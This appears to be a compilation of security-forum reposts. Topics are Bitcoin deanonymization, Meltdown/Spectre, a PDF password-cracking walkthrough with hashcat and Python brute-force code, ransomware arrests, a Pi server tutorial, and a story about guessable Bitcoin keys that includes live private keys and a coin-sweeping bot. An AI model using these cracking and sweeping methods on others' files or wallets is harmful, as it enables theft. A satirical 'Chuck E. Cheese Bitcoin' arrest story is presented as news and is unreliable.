channels of online social networks, namely, Twitter and the BitcoinTalk forum. Out of 5B tweets and 1M forum pages, we found 4.2K and 41K unique online identities, respectively, along with their public personal information and Bitcoin addresses. We then expanded the lists of Bitcoin addresses using closure analysis, where a Bitcoin address is used to identify a set of other addresses that are highly likely to be controlled by the same user. This allowed us to collect thousands more Bitcoin addresses for the users. By analyzing the transactions in the Blockchain, we were able to link up to 125 unique users to various hidden services, including sensitive ones, such as The Pirate Bay, Silk Road, and WikiLeaks. Finally, we traced concrete case studies to demonstrate the privacy implications of information leakage and user deanonymization. In particular, we show that Bitcoin addresses should always be assumed compromised and can be used to deanonymize users.

Link: http://qspace.qu.edu.qa/bitstream/handle/10576/5797/Deanonymizing Tor Hidden Service Users Through Bitcoin Transactions Analysis.pdf
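As an illustration of the "closure analysis" step the abstract mentions, here is a minimal Python sketch (not the thesis code) of the common-input-ownership heuristic: addresses that appear together as inputs to the same transaction are merged into one cluster with a union-find structure. The transactions and addresses below are made up.

from collections import defaultdict

class UnionFind:
    def __init__(self):
        self.parent = {}
    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x
    def union(self, a, b):
        self.parent[self.find(a)] = self.find(b)

def closure(transactions):
    """transactions: iterable of input-address lists, one list per transaction."""
    uf = UnionFind()
    for inputs in transactions:
        for addr in inputs:
            uf.union(inputs[0], addr)   # heuristic: all inputs of a tx share an owner
    clusters = defaultdict(set)
    for addr in uf.parent:
        clusters[uf.find(addr)].add(addr)
    return list(clusters.values())

# toy example: two transactions link addrA-addrB-addrC; addrD stays alone
print(closure([["addrA", "addrB"], ["addrB", "addrC"], ["addrD"]]))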
-
-
The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host. These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.

Sursa: https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html

What are Meltdown and Spectre?

Google described the two attacks as follows: Meltdown breaks the most fundamental isolation between user applications and the operating system. This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system. Google says it chose the Meltdown codename because "the bug basically melts security boundaries which are normally enforced by the hardware." Spectre breaks the isolation between different applications. It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of said best practices actually increase the attack surface and may make applications more susceptible to Spectre. "The name is based on the root cause, speculative execution. As it is not easy to fix, it will haunt us for quite some time," Google says. "Spectre is harder to exploit than Meltdown, but it is also harder to mitigate."

Sursa: https://www.bleepingcomputer.com/news/security/google-almost-all-cpus-since-1995-vulnerable-to-meltdown-and-spectre-flaws/
Sursa: https://danielmiessler.com/blog/simple-explanation-difference-meltdown-spectre/
-
In this series of blog posts, I’ll explain how I decrypted the encrypted PDFs shared by John August (John wanted to know how easy it is to crack encrypted PDFs, and started a challenge). Here is how I decrypted the “easy” PDF (encryption_test). From John’s blog post, I know the password is random and short. So first, let’s check out how the PDF is encrypted. pdfid.py confirms the PDF is encrypted (name /Encrypt): pdf-parser.py can tell us more: The encryption info is in object 26: From this I can conclude that the standard encryption filter was used. This encryption method uses a 40-bit key (usually indicated by a dictionary entry: /Length 40, but this is missing here). PDFs can be encrypted for confidentiality (requiring a so-called user password /U) or for DRM (using a so-called owner password /O). PDFs encrypted with a user password can only be opened by providing this password. PDFs encrypted with an owner password can be opened without providing a password, but some restrictions will apply (for example, printing could be disabled). QPDF can be used to determine if the PDF is protected with a user password or an owner password: This output (invalid password) tells us the PDF document is encrypted with a user password. I’ve written some blog posts about decrypting PDFs, but because we need to perform a brute-force attack here (it’s a short random password), this time I’m going to use hashcat to crack the password. First we need to extract the hash to crack from the PDF. I’m using pdf2john.py to do this. Note that John the Ripper (Jumbo version) is now using pdf2john.pl (a Perl program), because there were some issues with the Python program (pdf2john.py). For example, it would not properly generate a hash for 40-bit keys when the /Length name was not specified (like is the case here). However, I use a patched version of pdf2john.py that properly handles default 40-bit keys. Here’s how we extract the hash: This format is suitable for John the Ripper, but not for hashcat. For hashcat, just the hash is needed (field 2), and no other fields. Let’s extract field 2 (you can use awk instead of csv-cut.py): I’m storing the output in file “encryption_test – CONFIDENTIAL.hash”. And now we can finally use hashcat. This is the command I’m using:

hashcat-4.0.0\hashcat64.exe --potfile-path=encryption_test.pot -m 10400 -a 3 -i "encryption_test - CONFIDENTIAL.hash" ?a?a?a?a?a?a

I’m using the following options:
--potfile-path=encryption_test.pot : I prefer using a dedicated pot file, but this is optional
-m 10400 : this hash mode is suitable to crack the password used for 40-bit PDF encryption
-a 3 : I perform a brute force attack (since it’s a random password)
?a?a?a?a?a?a : I’m providing a mask for 6 alphanumeric characters (I want to brute-force passwords up to 6 alphanumeric characters; I’m assuming that when John mentions a short password, it’s not longer than 6 characters)
-i : this incremental option means that the generated passwords are not only 6 characters long, but also 1, 2, 3, 4 and 5 characters long

And here is the result: The recovered password is 1806. We can confirm this with QPDF: Conclusion: PDFs protected with a 4 character user password using 40-bit encryption can be cracked in a couple of seconds using free, open-source tools. 
FYI, I used the following GPU: GeForce GTX 980M, 2048/8192 MB allocatable, 12MCU

Update: this is the complete blog post series:
Cracking Encrypted PDFs – Part 1: cracking the password of a PDF and decrypting it (what you are reading now)
Cracking Encrypted PDFs – Part 2: cracking the encryption key of a PDF
Cracking Encrypted PDFs – Part 3: decrypting a PDF with its encryption key
Cracking Encrypted PDFs – Conclusion: don’t use 40-bit keys

Sursa: https://blog.didierstevens.com/2017/12/26/cracking-encrypted-pdfs-part-1/
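The post cracks the password on a GPU with hashcat; just to underline the conclusion that 4-character passwords are hopeless, here is a rough pure-Python sketch that tries every 4-digit PIN against the encrypted file using the pikepdf package (my own choice, not a tool used in the post). The filename is a guess based on the post, so adjust it to your own copy.

from itertools import product
import string

import pikepdf

def crack_numeric(path, length=4):
    """Try every numeric password of the given length; return the first one that opens the PDF."""
    for candidate in product(string.digits, repeat=length):
        password = "".join(candidate)
        try:
            with pikepdf.open(path, password=password):
                return password
        except pikepdf.PasswordError:
            continue
    return None

print(crack_numeric("encryption_test - CONFIDENTIAL.pdf"))  # the post's recovered password was 1806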
-
-
This course looks at web users from a few different perspectives. First, we look at identification techniques used to determine web user identities from a server perspective. Second, we look at obfuscation techniques from the perspective of a user who seeks to be anonymous. Finally, we look at forensic techniques which, given a hard drive or similar media, allow us to identify the users who accessed that server. Slides: http://opensecuritytraining.info/WebIdentity_files/WebIdentity_all_slides_pptx_1.zip HD video: Sursa: http://opensecuritytraining.info/WebIdentity.html
-
-
During the last week, Romanian authorities have arrested three individuals who are suspected of infecting computer systems by spreading the CTB-Locker (Curve-Tor-Bitcoin Locker) malware - a form of file-encrypting ransomware. Two other suspects from the same criminal group were arrested in Bucharest in a parallel ransomware investigation linked to the US. During this law enforcement operation called "Bakovia", six houses were searched in Romania as a result of a joint investigation carried out by the Romanian Police (Service for Combating Cybercrime), the Romanian and Dutch public prosecutor’s office, the Dutch National Police (NHTCU), the UK’s National Crime Agency, the US FBI with the support of Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT). As a result of the searches in Romania, investigators seized a significant amount of hard drives, laptops, external storage devices, cryptocurrency mining devices and numerous documents. The criminal group is being prosecuted for unauthorised computer access, serious hindering of a computer system, misuse of devices with the intent of committing cybercrimes and blackmail. In early 2017, the Romanian authorities received detailed information from the Dutch High Tech Crime Unit and other authorities that a group of Romanian nationals were involved in sending spam messages. This spam was specifically drafted to look like it was sent from well-known companies in countries like Italy, the Netherlands and the UK. The intention of the spam messages was to infect computer systems and encrypt their data with the CTB-Locker ransomware aka Critroni. Each email had an attachment, often in the form of an archived invoice, which contained a malicious file. Once this attachment was opened on a Windows system, the malware encrypted files on the infected device. CTB-Locker was first detected in 2014 and was one of the first ransomware variants to use Tor to hide its command and control infrastructure. It targets almost all versions of Windows, including XP, Vista, 7 and 8. Once infected, all documents, photos, music, videos, etc. on the device are encrypted asymmetrically, which makes it very difficult to decrypt the files without the private key in possession of the criminals, which might be released when victims pay the ransom. As a result of the law enforcement activities, more than 170 victims from several European countries have been identified to date; all filed complaints and provided evidence that will help with the prosecution of the suspects. Cerber ransomware in United States In addition to the spread of CTB-Locker, two people within the same Romanian criminal group are also suspected of distributing the Cerber ransomware. They were suspected of contaminating a large number of computer systems in the United States. The United States Secret Service has subsequently started an investigation into the Cerber ransomware infections. Initially, the CTB-Locker investigation was separate from the Cerber investigation. However, the two were joined when it turned out that the same Romanian group was behind both these attacks. At the time of the actions on CTB-Locker, the two suspects of the Cerber investigation had not yet been located. After the US authorities issued an international arrest warrant for the two suspects, they were arrested the day after in Bucharest while trying to leave the country. 
Crime-as-a-Service This case illustrates the Crime-as-a-Service (CaaS) model, as the services were offered to any criminal online. The investigation in this case revealed that the suspects did not develop the malware themselves, but acquired it from specific developers before launching various infection campaigns of their own, having to pay in return around 30% of the profit. This modus operandi is called an affiliation program and is "Ransomware-as-a-service", representing a form of cybercrime used by criminals mainly on the Dark Web, where criminal tools and services like ransomware are made available by criminals to people with little knowledge of cyber matters, circumventing the need for expert technological skills. Europol supported the investigation by hosting operational meetings, drafting digital forensic and malware analysis reports, collating intelligence and providing analytical support. The participating countries worked together in the framework of the EMPACT project targeting cyber-attacks that affect critical infrastructure and information systems in the EU. On the action day, forensic support was provided during the house searches with the intention of analysing data extracted from electronic devices and providing immediate results. Never pay the ransom Ransomware attacks are relatively easy to prevent if you maintain proper digital hygiene. This includes regularly backing up the data stored on your computer, keeping your systems up to date and installing robust antivirus software. Also, never open an attachment received from someone you don’t know or any odd looking link or email sent by a friend on social media, a company, online gaming partner, etc. If you do get infected, we advise you not to pay the requested ransom. It will not get you your files back and you will be funding criminal activity. We recommend you always report the infection to your national police authorities, as this will enable law enforcement to better tackle the criminal groups behind it. More prevention advice is available on www.nomoreransom.org. Sursa: https://www.europol.europa.eu/newsroom/news/five-arrested-for-spreading-ransomware-throughout-europe-and-us
-
NEW YORK CITY – A New York man has been arrested after he reportedly made over a million dollars selling Chuck E. Cheese tokens as Bitcoins on the streets. Marlon Jensen, 36, was arrested on a Sunday morning when NYPD stormed his home. NYPD received calls from the fraud victims that someone had sold them “Bitcoins”, only to find out there actually was no tangible bitcoin currency available. NYPD found $1.1 million in cash inside Marlon’s home. According to police, Marlon had scratched off most of the Chuck E. Cheese engravings on the coins, and would write “B” on each coin with permanent marker. As many should know already, Bitcoin is a crypto currency and payment system that has recently received unprecedented popularity and value, with each bitcoin currently worth $18,950 USD. Although Bitcoin isn’t actually a tangible form of currency, that hasn’t stopped some people from successfully selling “bitcoins” to people using irrelevant gold coins, in this case Chuck E. Cheese tokens. “People are retarded haha”, said NYPD Officer Michael West, “My 8 year old son would know those weren’t bitcoins and lord knows he’s not the brightest”. Marlon is currently being charged with fraud and can face up to 5 years in federal prison. Sursa: https://www.huzlers.com/bitcoin-scam-man-arrested-after-making-over-1-million-selling-chuck-e-cheese-tokens-as-bitcoins/
-
Story Save and access docs and photos and music on your own local Pi Cloud server! The best part: you can use it if, or when, the Internet goes down (or if you're in a remote spot & want access to Wikipedia). Oh hey, and if your friend gets one and they live close (*ahem*80ft*ahem*), you can share stuff with them and make your own personal chat line! If enough folks built Pi Cloud servers, we could crowdsource the Internet! That would be an 11/10 on a scale of greatness. With the new models of the Raspberry Pi computer, it's possible and not even expensive! (What! Tell me more!) This tutorial will show you how to set up a short-range (~ 80 ft) WiFi Access Point and a personal web server ('bringin it back to HTML bbies). You can set this up as a (closed) local network only (i.e. your own personal "cloud" backup device), or broadcast it to the rest of the world! (..if you do this be sure you know network security.) That said, assuming you have a basic knowledge of the Pi, here's the breakdown: Read Time: ~ 40 min Build Time: ~ 60 min (less if you are experienced w/ Linux) Cost: ~ $35 (for the Pi 3) Link: https://www.hackster.io/jenfoxb0t/make-your-pi-a-local-cloud-server-c4f3f1
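The heavy lifting in the linked tutorial is the access-point setup; the "personal web server" half can start as something as small as Python's built-in http.server. A minimal sketch, assuming Python 3.7+ on the Pi and a hypothetical /home/pi/cloud folder holding your docs, photos and music:

import http.server
import socketserver

PORT = 8080
DIRECTORY = "/home/pi/cloud"   # hypothetical folder to share on the local network

class Handler(http.server.SimpleHTTPRequestHandler):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=DIRECTORY, **kwargs)

with socketserver.TCPServer(("", PORT), Handler) as httpd:
    print("Serving", DIRECTORY, "on port", PORT)
    httpd.serve_forever()

Anyone on the Pi's WiFi network can then browse the folder at http://<pi-address>:8080/.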
-
-
-
I have NOT read the whole article, which is why the topic is in offtopic. If someone has the patience to read it and the information presented seems credible to them, leave a comment and I will move the topic.
-----------
Hi. Thanks for passing this along so it gets some attention. I was worried if I posted this somewhere it would mostly go unnoticed. Also, I'm trying to stay anonymous because I don't want to be accused of being the person who came up with this exploit or be blamed by any company for any damages. It's an interesting technical story so I thought I would share it.

-------- story begins here ----------------

I returned 9 BTC to reddit user fitwear, who recently claimed they were stolen from their blockchain.info wallet. I have evidence that some bitcoin address generation code in the wild is using private keys that can easily be discovered on a regular basis. This is either intentional or by mistake. Some wallets have been compromised by what is probably an innocent looking piece of code. Furthermore, someone has been siphoning bitcoin on a regular basis since 2014 from them. Whether they discovered this by accident (like I did) or are the ones who installed the code themselves, I don't know. It looks like either a clever exploit or a coding error. It could also be yet another piece of malware, however as I explain below, I feel this is less likely the case. In order to fully understand how this works and how I discovered it, please read on.

Some Background
---------------

I've been following bitcoin since I first heard of it in 2011. One of the things that fascinated me was the ability for someone to create private keys from just about anything using Sha256 (i.e. Sha256(password/phrase)). This, of course, is NOT a recommended way of obtaining a private key since if YOU can think of the word/phrase, someone else can too and the likelihood of your bitcoins being stolen is quite high. The most secure private keys are generated randomly. The probability of someone else being able to generate the same sequence of 32 random bytes is so close to 0, it is highly improbable anyone ever will (given the expected lifespan of the universe). If you peer into the blockchain, you will find that people have 'played' with the chain by sending small amounts of bitcoins to addresses corresponding to private keys generated using Sha256. For example, Sha256 of each word in the entire /usr/dict/words file found on most UNIX systems has had a small amount sent to it. There was a site called brainwallet.org that made it easy for you to convert a phrase into a private key + public address. (The code is still available on GitHub but has since been removed from the Internet). Try using phrases like "i find your lack of faith disturbing", "these aren't the droids you're looking for" or "satoshi nakamoto" as inputs to Sha256. You'll find the addresses corresponding to those private keys have had small amounts sent to them (and transferred out). It's quite obvious these were _meant_ to be found. It turns out there are a lot of these addresses. (Keep looking and you will easily find some.) This is nothing new and has been known to the bitcoin community for a while. I always had the idea in the back of my mind to try and find other non-trivial examples of 'discoverable' private keys. That is, something beyond Sha256(word/phrase). So I decided to try and hunt for buried bitcoin treasure. Perhaps I could find some bitcoin intentionally hidden by someone that hadn't yet been discovered? 
In the first couple weeks of June 2017, I finally devoted some time to the task. I honestly didn't expect to find much but I was amazed at what I ended up discovering. I began by writing a program to scan every block in the blockchain and record every public address that had ever been used. (Note: I didn't only store addresses for which the balance was greater than zero, I stored ALL of them, which is why I believe I ended up accidentally discovering what I did.) There were only about 290 million at the time so this wasn't a big deal. The Experiments --------------- What follows is a description of my experiments and what led me to discover what I believe is either a scam or a really bad coding error. Experiment 1 ------------ My first experiment was to see if anyone used a block hash as a private key. That would actually be a nifty way to 'compress' 32 bytes in your head. You would only have to remember the block height (which is only maybe 6 digits) and the corresponding larger 32-byte number would be saved for all time in the chain itself! Results: Success! I found 46 addresses that had some amount of bitcoin sent to them between 2009 and 2016. As expected, these all had 0 balances, either because the owner had taken them back or they were discovered by someone else. Here are two examples. You can use blockchain.info to see these hex values are actually block hashes from early in the chain. This happened on/off up until mid-2016. 1Buc1aRXCqdh6r7PRYWPAy3EtVFw5Ue5dk 000000006a625f06636b8bb6ac7b960a8d03705d1ace08b1a19da3fdcc99ddbd 1KLZnkqU94ZKpgtcWCRs1mhqtF23jTLMgr 000000004ebadb55ee9096c9a2f8880e09da59c0d68b1c228da88e48844a1485 Nothing really alarming so far. Experiment 2 ------------ Similar to my first experiment, I then searched for addresses that were generated from the merkle root used as a private key. (BTW, I searched for both compressed/uncompressed keys, so each 32 bytes resulted in two address look-ups from my database). Results: Yes! I found 6 addresses, again up until mid-2016. Even though every address I found had a 0 balance (again expected), I was having fun with my success! Example: 13bkBdHRovsBkjM4BUsbcDNr9DCTDcpy9W 6c951c460a4cfe5483863adacafad59e5de7e55876a21857733ca94049d7d10c Similar to merkle roots and block hashes, transaction ids (hashes) also seem to have been used as private keys. Still nothing alarming to me thus far. Experiment 3 ------------ I wondered at this point if anyone might have used repeated Sha256 on words. Why stop at just one iteration when you can easily do one million? Also, it becomes less likely to be discovered the more iterations you do. I found a bunch. Here are a few: Sha256('sender') x 2 18aMGf2AxQ3YXyNv9sKxiHYCXcBJeJv9d1 098f6d68ce86adb2d8ba672a06227f7d177baca3568092e4cda159acca5eb0c7 Sha256('receiver') x 2 1C3m5mFx6SjBCpw6qLqzM8izZArVYQ9B5u 6681b4b6aa44318e55a724d7135ff23d76eb75847802cd7d220ecaa8427b91d4 Sha256('hello') x 4 17UZ4iVkmNvKF9K2GWrGyMykX2iuAYbe1X 28b47e9b141279ea00333890e3e3f20652bbd7abc2b66c62c5824d4d6fe50ac9 Sha256('hello') x 65536 1Mi5mVANRNAetbJ21u2hzs28qCJC19VcXY 52fa8b1d9fbb264d53e966809ce550c3ab033248498da5ac0c5ab314ab45198e Sha256('password') x 1975 (This one's my favorite, someone's birth year?) 13mcYPDDktHdjdq9LwchhU5AqkRB1FD6JE 6e8cdae20bef63d33cb6d5f1c6c9c954f3148bfc88ef0aa1b51fd8b12fa9b41c People were obviously burying bitcoin in the chain. Whether they expected the coins to be taken or not, we'll never know. But these methods were still highly 'discoverable' in my opinion.
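As a quick illustration of Experiment 3 (my own sketch, not the author's scanner): apply SHA-256 repeatedly and treat the final 32 bytes as a candidate private key. Note that whether each round re-hashes the raw digest or its hex encoding is a convention choice, so the output below may or may not correspond to the exact keys listed above; the sketch uses the raw-digest variant.

import hashlib

def iterated_sha256(word: str, rounds: int) -> bytes:
    data = word.encode()
    for _ in range(rounds):
        data = hashlib.sha256(data).digest()   # re-hash the raw 32-byte digest each round
    return data

print(iterated_sha256("hello", 4).hex())       # cf. the Sha256('hello') x 4 key above
print(iterated_sha256("password", 1975).hex()) # cf. the Sha256('password') x 1975 key above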
Experiment 4 ------------ My last experiment is the one that led me to believe someone was siphoning bitcoin from some service on a regular basis and has been since 2014. Take a look at this private key: KyTxSACvHPPDWnuE9cVi86kDgs59UFyVwx2Y3LPpAs88TqEdCKvb The public address is: 13JNB8GtymAPaqAoxRZrN2EgmzZLCkbPsh The raw bytes for the private key look like this: 4300d94bef2ee84bd9d0781398fd96daf98e419e403adc41957fb679dfa1facd Looks random enough. However, these bytes are actually sha256 of this public address! 1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj I discovered this by performing Sha256 on all the public addresses I had collected from the setup of my experiments and then seeing if those addresses (from the generated private keys) were ever used. Bingo! Lots were coming up. I searched a fraction of the chain and found dozens. I also found these addresses had bitcoin sent to them very recently (within weeks/days of when I discovered them.) I asked myself, "Why would someone do this?" At first, I thought this was someone who thought they could get away with having to remember only one piece of information rather than two. Maybe they have one favorite address/private key combo and derived another from that one? I thought it was possible. You could keep doing this in a chain and derive as many as you wanted and only ever have to remember the first one. But I ruled this out for one simple reason; bitcoins transferred into those addresses were being transferred out within minutes or SECONDS. If someone generated these private keys for themselves, then why would the coins be almost immediately transferred out in every case I looked at? Here are some more (complete list at end of this doc): 16FKGvEtu5KPMZqiTK4yjmsSZsJLyxz9fr from Sha256(1CRWfJdgVrfKLRS4G3vTMRhEQrCZZyHNMo) 1HwxL1vutUc42ikh3RBnM4v2dVRHPTrTve from Sha256(1FfmbHfnpaZjKFvyi1okTjJJusN455paPH) 1FNF3xfTE53LVLQMvH6qteVqrNzwn2g2H8 from Sha256(1H21ndKEuMqZbeMMCqrYArCdV8WeicGehB) In every case I looked at, the coins were moved away within minutes or seconds. It was much more likely that a bot was waiting for those coins to show up. Also, transactions are STILL happening to this day on those addresses! But how can that bot know in advance that address was about to receive bitcoins? A Scam or a mistake? -------------------- It is at this point I formed a theory on what was really happening. It is likely that someone installed malicious code into the backend system of a mining pool, an exchange, or possibly wallet generation code. They are using public information so that they can discover the private keys easily and steal the coins on the side. But why would they use Sha256(public_address)? Why not do Sha256(public_address + some super hard to guess random sequence) or just use a hard-coded address? Well, I have a theory on that too. It can't be hard-coded or it would look suspicious in a source code repository. It's likely the code was introduced by someone who works (or worked) for some company connected to bitcoin (exchange/mining pool/gambling site/wallet). Code submitted by developers into source control systems usually goes through a code review process. It would be much easier to hide an innocent looking Sha256 operation inside the millions of lines of code that make up the backend. Sha256 is used all over the place in bitcoin and it wouldn't look suspicious. The function would be readily available. However, if code were to be submitted that performed Sha256(address + "secret_password1234xyz"), that would look VERY suspicious. 
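The Experiment 4 relationship is easy to check for yourself; the snippet below (mine, not the author's) just recomputes SHA-256 of the quoted source address so the result can be compared against the raw private key given above.

import hashlib

source_address = "1LGUyTbp7nbqp8NQy2tkc3QEjy7CWwdAJj"
claimed_private_key = "4300d94bef2ee84bd9d0781398fd96daf98e419e403adc41957fb679dfa1facd"

derived = hashlib.sha256(source_address.encode()).hexdigest()   # SHA-256 of the address string
print(derived)
print(derived == claimed_private_key)                           # True if the post's claim holds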
My guess is someone has slipped in a routine that LOOKS harmless but is actually diverting bitcoin to their awaiting bot ready to gobble them up. It's actually quite clever. No one can know the destination address in advance. You would have to keep performing Sha256 on all public addresses ever used to catch that one in a million transaction. Someone would be able to capture those coins by simply watching for a transaction into an address that corresponds to a private key generated from Sha256 of one of the existing public addresses. Keeping such a database is trivial and lookups are quick. To be fair, I suppose this could be a coding error. Anything is possible with a buffer overflow. I would love to see the code if this is ever found. Transactions were STILL happening right up until a couple weeks before I made this discovery! So I wrote a bot to try and 'catch' a transaction. Mind Blown ---------- Within the FIRST 48 HOURS of my bot going live, on Jun 19, a whopping 9.5 BTC was transferred into an address for which I had the private key. This was approximately worth $23,000 USD at the time. I was shocked. This is the address: 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp The private key is: KzfWTS3FvYWnSnWhncr6CwwfPmuHr1UFqgq6sFkGHf1zc49NirkC whose raw bytes are derived from Sha256 of: 16SH69WgJCXYXWV58sxjTxonhgBh5HCZTt (which appears to be some random address previously used in the chain) BUT... I had failed to test my program sufficiently and it failed to submit the transaction! The 9.5 BTC was sitting there for almost 15 minutes before being swept away by someone else. I honestly didn't think the first amount to cross my radar would be so high. The other samples I found from past transactions were for tiny amounts. It is quite possible that whoever moved them later out of the poisoned address actually owned them. Maybe someone else's sweeper bot only takes small amounts most of the time to avoid attention? At this point, I was pretty confident I was on to something not yet discovered by anyone else. I _could_ have taken those 9.5 BTC, and so could anyone else if this were known to others. Also, if you look into the history of that account, 12 BTC was transferred into it (and out right away) only one month earlier. No one has claimed any theft (to my knowledge) involving that address. I fixed my program (actually tested it properly this time) and let it run again. My program detected more transactions (2 within the next 48 hours). I coded my bot to ignore anything less than .1 BTC so I didn't move them. I didn't want to tip off anyone that I knew what they were doing (if that was indeed the case). Another 3-4 days passed and the next hit my bot detected was for roughly .03 BTC (~$95USD). For some reason, this was not transferred out immediately like the rest. By this time it was July 4th weekend. I let this one sit too and it took a full 7 days before it was moved (not by me). It may have been the legitimate owner or a bot. We'll never know. The destination address was: 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p The private key raw bytes were: c193edeeb4e7fb5c3e01c3aebd2ec5ac13f349a5a78ca4112ab6a4cbf8e35404 The plot thickens... -------------------- I didn't realize it at the time but that last transfer was into an address for a private key not generated from another public address like the first one. Instead, this address was generated from a transaction id! I had forgotten that I seeded my database with private keys generated with transaction ids as part of one of my earlier experiments.
I didn't label them, so I didn't know which were from Sha256(pub address) and which were from transaction ids. I found some hits at the time but when I checked the balances for those accounts, they were all zero and I didn't think anything of it. But now my database was detecting ongoing transfers into THOSE addresses (transaction-id based) too! Okay, someone was possibly using information from the blockchain itself to ensure private keys were discoverable for the addresses they were funnelling bitcoin into. The interesting thing is I found a link between the 12fcWddtXyxrnxUn6UdmqCbSaVsaYKvHQp address (via sha of a public address) AND the 1LUqqMzaigWJTzaP79oxsD6zKGifokrh7p transfer (via the tx id as a key). In the history of both of these addresses, you can see the BTC eventually ended up in this address: 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE Also, the transaction id was for the previous transaction to the one that put the BTC in the toxic (discoverable) address in the first place. Now it became even more clear. The malicious code sometimes used a recent transaction id as the private key for the doomed destination address. Follow the .03 BTC back and you will see what I mean; you eventually get to the txid = private key for that discoverable address. The 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE address is ONE of the collection addresses. I have reason to believe there have been many over the years. This one only goes back to approximately March 2017. You can see in the history of this one address when they consolidated their ill-gotten gains into one transaction back to themselves. I let my bot run longer. The next hit I got was for block hashes that were used as private keys (see Experiment #1). Sure enough, this address also had links to the 1JCuJXsP6PaVrGBk3uv7DecRC27GGkwFwE collection address! And remember my merkle root experiment? I believe those were also part of this. However, I have not linked those to this one particular collection address yet. In the end, I found a total of four different 'discoverable' private key methods being used. I made sure my database was filled with every block hash, merkle root, transaction id and Sha256(public address) for private keys and let my bot run. Transactions for all four types were showing up, again for tiny amounts which I ignored. By this time, I was watching BTC getting taken in small amounts regularly. Sometimes, I saw as many as 6 transactions fly by in one day. How fitwear lost (and got back) 9 BTC ------------------------------------- On Nov 12, my program saw 9 BTC transferred into an address that my database had the private key for. I had searched for that address too to see if anyone was claiming ownership but I didn't see anything. I decided to send a small amount to a well known puzzle address to give the transaction some public scrutiny in an anonymous way (1FLAMEN6, I'm still trying to solve this BTW). Shortly after, I became aware of fitwear's reddit post claiming theft after someone noticed the prize amount had been topped off and linked the two events together. I contacted fitwear privately and returned their coins minus the small amount I sent to the puzzle address. Blockchain.info's original response to his support ticket was that his system must have been compromised. However, if you read his post, he took every precaution including typing in the key for his paper wallet instead of copy/paste and using 2FA.
In his case, in Aug 2017, he imported the private key for his 1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo paper wallet address into blockchain.info and submitted a test transaction. At some point between then and Nov 12, the compromised 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit got into his online wallet as an 'imported' address. Together, we contacted blockchain.info and I relayed the information I just outlined above to them. Their security team investigated but found no evidence it was their system that was at fault. I suppose it's possible his system was somehow compromised back in August and managed to import a key into blockchain.info without him knowing it. Or someone else logged into his account, imported the key, then waited. I feel the malware/login explanations are much less likely because it looks like code attempting to 'hide in plain sight' to me. You wouldn't need to use Sha256(address) or block hash or txid or merkleroot if you were malware or an unauthorized login. You would at least salt or obscure the key with some bit of knowledge only you know so that only you could derive the private key (as mentioned earlier). The fact that information from the blockchain itself is being used indicates it may be some transaction processing logic. Also, fitwear took extreme precautions (you can read his reddit post for details). The origin of these poison destination addresses remains a mystery. If it's the case that some wallet generation code is doing this, then it may be the case that we're seeing 'change' transactions. When you create a wallet, there may be 20 addresses generated. They are all supposed to be random keys. If this rogue code creates one of them in this manner (based on the public address string of an earlier one), then at some point, your 'change' will get put back into it as the wallet 'round-robins' through the list. fitwear's 15Z address sat unused until Nov 12 when fitwear transferred his 9 BTC into it using blockchain.info. To see the connection, take a look at this: echo -n "1Ca15MELG5DzYpUgeXkkJ2Lt7iMa17SwAo" | sha256sum 9e027d0086bdb83372f6040765442bbedd35b96e1c861acce5e22e1c4987cd60 That hex number is the private key for 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit!!! fitwear insists he did not import the key for that address. Did Blockchain.info generate it or was it added by malicious browser code? We may never know. See below for the complete list of other Sha256 based addresses that suffer from the same issue. I believe this is happening for others. It's likely that the small amounts usually taken are going unnoticed by the owners. What does this mean for bitcoin? Nothing probably. I believe the bitcoin network itself to be secure. However, as long as humans are involved in the services that surround it (mining pools, exchanges, online/mobile wallets) there is always a chance for fraud or error. The bitcoin network itself may be 'trustless', but anything humans touch around its peripheries is certainly not. And you need to use those services to get in/out of the network. So even with bitcoin, it still boils down to trust. To be fair to blockchain.info, only Sha256(public address) (one in particular) was found to be present in one of their wallets. The other 3 methods I described above could be completely unrelated. And they could all possibly be a (really weird) software bug. Here are 100+ addresses that received bitcoins whose private keys are the bytes resulting from Sha256 of another public address.
